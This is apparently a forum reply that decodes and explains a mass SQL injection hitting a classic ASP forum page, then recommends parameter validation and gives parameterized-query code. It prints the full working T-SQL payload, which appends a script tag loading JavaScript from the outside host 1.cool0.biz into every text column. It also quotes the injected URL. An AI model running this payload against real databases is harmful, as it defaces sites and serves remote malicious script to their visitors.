The decoded code is:

dEcLaRe @t vArChAr(255),@c vArChAr(255)
dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b
wHeRe a.iD=b.iD AnD a.xTyPe='u'
AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167)
oPeN tAbLe_cursoR
fEtCh next FrOm tAbLe_cursoR iNtO @t,@c
while(@@fEtCh_status=0) bEgIn
exec('UpDaTe ['+@t+'] sEt ['+@c+']=['+@c+']+ cAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F312E636F6F6C302E62697A2F312E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67))')
fEtCh next FrOm tAbLe_cursoR iNtO @t,@c
eNd
cLoSe tAbLe_cursoR
dEAlLoCaTe tAbLe_cursoR;

Copy it into Query Analyzer and take a look. If you PRINT the cAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F312E636F6F6C302E62697A2F312E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67)) part, you will find that it is a piece of JS code.
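For your specific problem, act/forum/showtopic.asp page=1: in this ASP page of yours, validate the parameters properly; for example, if request("page") is not a number, show an error.
It should be, for example:
For your specific problem, showtopic.asp page=1&topic_id=28970&forum_id=6';dEcLaRe%...: in this ASP page of yours, validate the parameters properly; for example, if request("forum_id") is not a number, show an error.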
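One way to do the parameter check suggested above in classic ASP, as an added example that is not part of the original post or the site's own code. The helper name RequireInt, the connection string placeholder, and the table and column names are assumptions; the parameter names come from the URL quoted above.

```vbscript
<%
Option Explicit

' Placeholder (assumption): replace with the site's real connection string.
Const CONN_STR = "<connection string placeholder>"
' ADO constants, declared here so the page needs no include file.
Const adInteger = 3, adParamInput = 1, adCmdText = 1

' Hypothetical helper: return the named query-string value as a Long, or
' Null when it is not a plain decimal integer. A strict pattern is used
' instead of IsNumeric, which also accepts forms such as "1e5" and "&H10".
Function RequireInt(name)
    Dim re, raw
    RequireInt = Null
    raw = Request.QueryString(name) & ""   ' force a string, "" when absent
    Set re = New RegExp
    re.Pattern = "^[0-9]{1,9}$"            ' digits only, fits in a Long
    If re.Test(raw) Then RequireInt = CLng(raw)
End Function

Dim page, topicId, forumId
page    = RequireInt("page")
topicId = RequireInt("topic_id")
forumId = RequireInt("forum_id")

' A value such as 6';dEcLaRe... fails the pattern and is rejected here,
' before any SQL is built.
If IsNull(page) Or IsNull(topicId) Or IsNull(forumId) Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid parameter."
    Response.End
End If

' Bind the validated values as typed parameters instead of concatenating
' them into the SQL text. Table and column names are hypothetical.
Dim cmd, rs
Set cmd = Server.CreateObject("ADODB.Command")
cmd.ActiveConnection = CONN_STR
cmd.CommandType = adCmdText
cmd.CommandText = "SELECT title, body FROM topics WHERE topic_id = ? AND forum_id = ?"
cmd.Parameters.Append cmd.CreateParameter("topic_id", adInteger, adParamInput, , topicId)
cmd.Parameters.Append cmd.CreateParameter("forum_id", adInteger, adParamInput, , forumId)
Set rs = cmd.Execute
%>
```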